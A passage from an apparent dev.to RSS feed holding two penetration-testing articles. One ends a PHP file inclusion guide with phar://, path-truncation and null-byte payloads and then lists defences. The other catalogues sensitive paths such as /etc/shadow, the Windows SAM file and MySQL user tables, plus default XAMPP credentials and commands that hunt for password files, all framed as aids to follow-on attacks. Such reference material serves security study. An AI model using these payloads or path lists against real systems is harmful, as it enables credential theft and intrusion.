&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="n"&gt;fileinclude2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;phar&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;//J0.zip\J0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrlrholw3rn8efg0h4t8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrlrholw3rn8efg0h4t8.png" alt=" " width="799" height="246"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; The same approach as in the previous sections applies to both &lt;code&gt;zip://&lt;/code&gt; and &lt;code&gt;phar://&lt;/code&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Length Truncation
&lt;/h4&gt;

&lt;p&gt;Applies to PHP versions &amp;lt; 5.2.8. Path strings have a maximum length (4096 bytes on Linux, 256 bytes on Windows). Repeat &lt;code&gt;./&lt;/code&gt; many times:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;index.php?file&lt;span class="o"&gt;=&lt;/span&gt;phpinfo.php././././... &lt;span class="o"&gt;(&lt;/span&gt;repeated&lt;span class="o"&gt;)&lt;/span&gt; ././
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the maximum is reached, the suffix &lt;code&gt;/test/test.php&lt;/code&gt; is discarded.&lt;/p&gt;

&lt;p&gt;Example on Windows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude2.php?file&lt;span class="o"&gt;=&lt;/span&gt;phpinfo.php/./././... &lt;span class="o"&gt;(&lt;/span&gt;many repetitions&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rd5q26rwwvtkea3ffr3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rd5q26rwwvtkea3ffr3.png" alt=" " width="800" height="235"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Adding too many repetitions may exceed the limit:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhq5zzn16hl9an9lqc0h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhq5zzn16hl9an9lqc0h.png" alt=" " width="800" height="244"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Null Byte Truncation (&lt;code&gt;%00&lt;/code&gt;)
&lt;/h4&gt;

&lt;p&gt;Principle: &lt;code&gt;chr(0)&lt;/code&gt; acts as a string terminator. Everything after &lt;code&gt;%00&lt;/code&gt; is ignored.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;magic_quotes_gpc = Off&lt;/code&gt; (if &lt;code&gt;On&lt;/code&gt;, &lt;code&gt;%00&lt;/code&gt; becomes &lt;code&gt;\0&lt;/code&gt; and is escaped)&lt;/li&gt;
&lt;li&gt;PHP version &amp;lt; 5.3.4
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight diff"&gt;&lt;code&gt;&lt;span class="gh"&gt;index.php?file=phpinfo.php%00
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqphvmgnnvvg6u5orva5l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqphvmgnnvvg6u5orva5l.png" alt=" " width="800" height="196"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h2&gt;
  
  
  Defence Measures
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Configure PHP's &lt;code&gt;open_basedir&lt;/code&gt; to restrict file access to specified directories. Inclusion then fails for any file outside the permitted directories.&lt;/li&gt;
&lt;li&gt;Manage file permissions carefully.&lt;/li&gt;
&lt;li&gt;Limit includable files via whitelisting or by setting a dedicated include directory.&lt;/li&gt;
&lt;li&gt;Filter dangerous characters: &lt;code&gt;.&lt;/code&gt; (dot), &lt;code&gt;/&lt;/code&gt; (forward slash), &lt;code&gt;\&lt;/code&gt; (backslash), and other special characters. Note that the encoding bypasses described above target exactly this kind of filter, so character filtering should supplement, not replace, the whitelist in item 3.&lt;/li&gt;
&lt;li&gt;Set &lt;code&gt;allow_url_fopen = Off&lt;/code&gt; and &lt;code&gt;allow_url_include = Off&lt;/code&gt;. Although many pseudo‑protocols still work (local wrappers such as &lt;code&gt;zip://&lt;/code&gt; and &lt;code&gt;phar://&lt;/code&gt; shown above do not depend on these settings), this reduces the attack surface.&lt;/li&gt;
&lt;li&gt;Avoid dynamic inclusion whenever possible.&lt;/li&gt;
&lt;/ol&gt;

</description>
      <category>php</category>
      <category>cybersecurity</category>
      <category>vulnerabilities</category>
      <category>file</category>
    </item>
    <item>
      <title>Windows and Linux Sensitive Directory Path Summary</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Sun, 07 Jun 2026 05:01:24 +0000</pubDate>
      <link>https://dev.to/excalibra/windows-and-linux-sensitive-directory-path-summary-3b1o</link>
      <guid>https://dev.to/excalibra/windows-and-linux-sensitive-directory-path-summary-3b1o</guid>
      <description>&lt;h1&gt;
  
  
  Windows and Linux Sensitive Directory Path Summary
&lt;/h1&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Abstract:&lt;/strong&gt; This article describes how to exploit file inclusion and arbitrary file download vulnerabilities. It provides file lookup commands for different operating systems, lists common configuration file names for Apache, MySQL, PHP, etc., and mentions sensitive files and information, such as probe pages, system files, and critical paths in content management systems (CMS). In addition, default paths for website building tools such as XAMPP and phpStudy are covered, along with relevant files for common CMS platforms.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  0x01 Basic Information
&lt;/h2&gt;

&lt;p&gt;When encountering vulnerabilities such as file inclusion or arbitrary file download, the information in this article can be utilised to facilitate subsequent attacks.&lt;/p&gt;

&lt;h2&gt;
  
  
  0x02 Configuration Files
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Finding Files
&lt;/h3&gt;

&lt;p&gt;If command execution is possible, use the lookup commands directly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Linux-related commands:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find a file&lt;/span&gt;
find / &lt;span class="nt"&gt;-name&lt;/span&gt; filename.ext

&lt;span class="c"&gt;# Search entire disk for files containing 'flag'&lt;/span&gt;
&lt;span class="nb"&gt;grep &lt;/span&gt;flag &lt;span class="nt"&gt;-r&lt;/span&gt; /
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Windows-related commands:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Search entire disk for a file; be sure to add an asterisk!&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; /r c:&lt;span class="se"&gt;\ &lt;/span&gt;%i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;password.txt&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; @echo %i
&lt;span class="k"&gt;for&lt;/span&gt; /r c:&lt;span class="se"&gt;\ &lt;/span&gt;%i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;.ini&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; @echo %i

&lt;span class="c"&gt;# Search drive C: for files containing the string 'password'; double quotes are required!&lt;/span&gt;
findstr /s /n &lt;span class="s2"&gt;"password"&lt;/span&gt; c:&lt;span class="se"&gt;\*&lt;/span&gt;

&lt;span class="c"&gt;# Check whether pwd.txt contains the string 'password'; double quotes are required!&lt;/span&gt;
find /N /I &lt;span class="s2"&gt;"password"&lt;/span&gt; pwd.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Common Configuration File Names
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Apache
httpd.conf

# MySQL
my.ini

# Virtual host configuration
httpd-vhosts.conf

# IIS
metabase.xml
applicationHost.config

# SSH
/etc/ssh/sshd_config

# Nginx
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default

# PHP
php.ini

# WebLogic (read password)
./security/SerializedSystemIni.dat
./config/config.xml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Apache
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Configuration file path&lt;/span&gt;
/etc/httpd/conf/httpd.conf

&lt;span class="c"&gt;# Default site path&lt;/span&gt;
/var/www/html/

&lt;span class="c"&gt;# Ubuntu configuration file&lt;/span&gt;
/etc/apache2/apache2.conf

&lt;span class="c"&gt;# Access log and error log&lt;/span&gt;
/private/var/log/apache2/error_log
/private/var/log/apache2/access_log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  IIS
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Configuration file&lt;/span&gt;
web.config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  MySQL
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Configuration file&lt;/span&gt;
/etc/my.cnf
/etc/mysql/my.cnf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  phpMyAdmin
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Configuration file&lt;/span&gt;
config.inc.php

&lt;span class="c"&gt;# Default path&lt;/span&gt;
/var/www/phpmyadmin/config.inc.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  XAMPP Suite
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Related paths:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Website default path
xampp\htdocs

# Apache basic configuration
xampp\apache\conf\httpd.conf

# Apache SSL
xampp\apache\conf\ssl.conf

# Apache Perl (plugin only)
xampp\apache\conf\perl.conf

# Apache Tomcat (plugin only)
xampp\apache\conf\java.conf

# Apache Python (plugin only)
xampp\apache\conf\python.conf

# Virtual hosts
xampp/apache/conf/extra/httpd-vhosts.conf

# PHP
xampp\php\php.ini

# Database default path
xampp\mysql\data

# MySQL
xampp\mysql\bin\my.ini

# phpMyAdmin
xampp\phpMyAdmin\config.inc.php

# FileZilla FTP server
xampp\FileZilla

# FTP/FileZilla Server.xml
Mercury

# Mercury mail server basic configuration
xampp\MercuryMail\MERCURY.INI

# Sendmail
xampp\sendmail\sendmail.ini
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Default passwords:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# MySQL
User: root   Password: (empty)

# FileZilla FTP
User: newuser   Password: wampp
User: anonymous   Password: some@mail.net

# Mercury
Postmaster: postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
TestUser: newuser   Password: wampp

# WEBDAV
User: wampp   Password: xampp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  phpStudy Suite
&lt;/h3&gt;

&lt;p&gt;Earlier versions of the phpStudy suite were reported to be problematic, with issues such as port conflicts and poor database management. However, when tested again on Windows (as of August 2019), these problems were no longer observed, reflecting the rapid evolution of technology and product updates.&lt;/p&gt;

&lt;p&gt;There is also a Pro version, so the paths have changed accordingly. This summary takes the Pro version as an example; for the standard version, simply remove 'Pro'.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Related paths:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Root directory
phpstudy\WWW
phpstudy_pro\WWW

# phpMyAdmin
phpstudy_pro\WWW\phpMyAdmin4.8.5

# PHP: In the Pro version, plugins are displayed as extensions.
phpstudy_pro\Extensions\php\php7.3.4nts\php.ini
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  0x03 Sensitive Files
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Probe Information
&lt;/h3&gt;

&lt;p&gt;When using XAMPP/LAMPP/phpStudy/PHPnow, some probe pages may be left behind, revealing useful information, such as &lt;code&gt;Document_Root&lt;/code&gt; (representing the website root directory) and &lt;code&gt;session.save_path&lt;/code&gt; (storing session information).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1.php
l.php
p.php
probe.php
test.php
info.php
phpinfo.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Windows
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# View system version&lt;/span&gt;
c:&lt;span class="se"&gt;\b&lt;/span&gt;oot.ini

&lt;span class="c"&gt;# IIS configuration file&lt;/span&gt;
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\s&lt;/span&gt;ystem32&lt;span class="se"&gt;\i&lt;/span&gt;netsrv&lt;span class="se"&gt;\M&lt;/span&gt;etaBase.xml

&lt;span class="c"&gt;# Stores the initial installation password for Windows&lt;/span&gt;
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\r&lt;/span&gt;epair&lt;span class="se"&gt;\s&lt;/span&gt;am

&lt;span class="c"&gt;# MySQL configuration&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogramFiles&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\m&lt;/span&gt;y.ini

&lt;span class="c"&gt;# MySQL root password&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogramFiles&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\d&lt;/span&gt;ata&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\u&lt;/span&gt;ser.MYD

&lt;span class="c"&gt;# PHP configuration information&lt;/span&gt;
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\p&lt;/span&gt;hp.ini
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Linux
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Basic Linux privilege escalation paths:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Account information&lt;/span&gt;
/etc/passwd

&lt;span class="c"&gt;# Account password file&lt;/span&gt;
/etc/shadow

&lt;span class="c"&gt;# Apache2 default configuration file&lt;/span&gt;
/usr/local/app/apache2/conf/httpd.conf

&lt;span class="c"&gt;# Virtual website configuration&lt;/span&gt;
/usr/local/app/apache2/conf/extra/httpd-vhost.conf

&lt;span class="c"&gt;# PHP configuration file&lt;/span&gt;
/usr/local/app/php5/lib/php.ini

&lt;span class="c"&gt;# Apache configuration file&lt;/span&gt;
/etc/httpd/conf/httpd.conf

&lt;span class="c"&gt;# MySQL configuration file&lt;/span&gt;
/etc/my.conf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  0x04 Common CMS Examples
&lt;/h2&gt;

&lt;h3&gt;
  
  
  CMS-A
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/member/templets/menulit.php
/plus/paycenter/alipay/return_url.php
/plus/paycenter/cbpayment/autoreceive.php
/paycenter/nps/config_pay_nps.php
/plus/task/dede-maketimehtml.php
/plus/task/dede-optimize-table.php
/plus/task/dede-upcache.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  CMS-B
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/wp-admin/includes/file.php
/wp-content/themes/theme-name/footer.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  CMS-C
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  CMS-D
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/admin/inc/hack/count.php?job=list
/admin/inc/hack/search.php?job=getcode
/admin/inc/ajax/bencandy.php?job=do
/cache/MysqlTime.txt
/cms-root/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  CMS-E
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
/lib/default/special_act.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>vulnerabilities</category>
      <category>directory</category>
      <category>cybersecurity</category>
      <category>path</category>
    </item>
  </channel>
</rss>
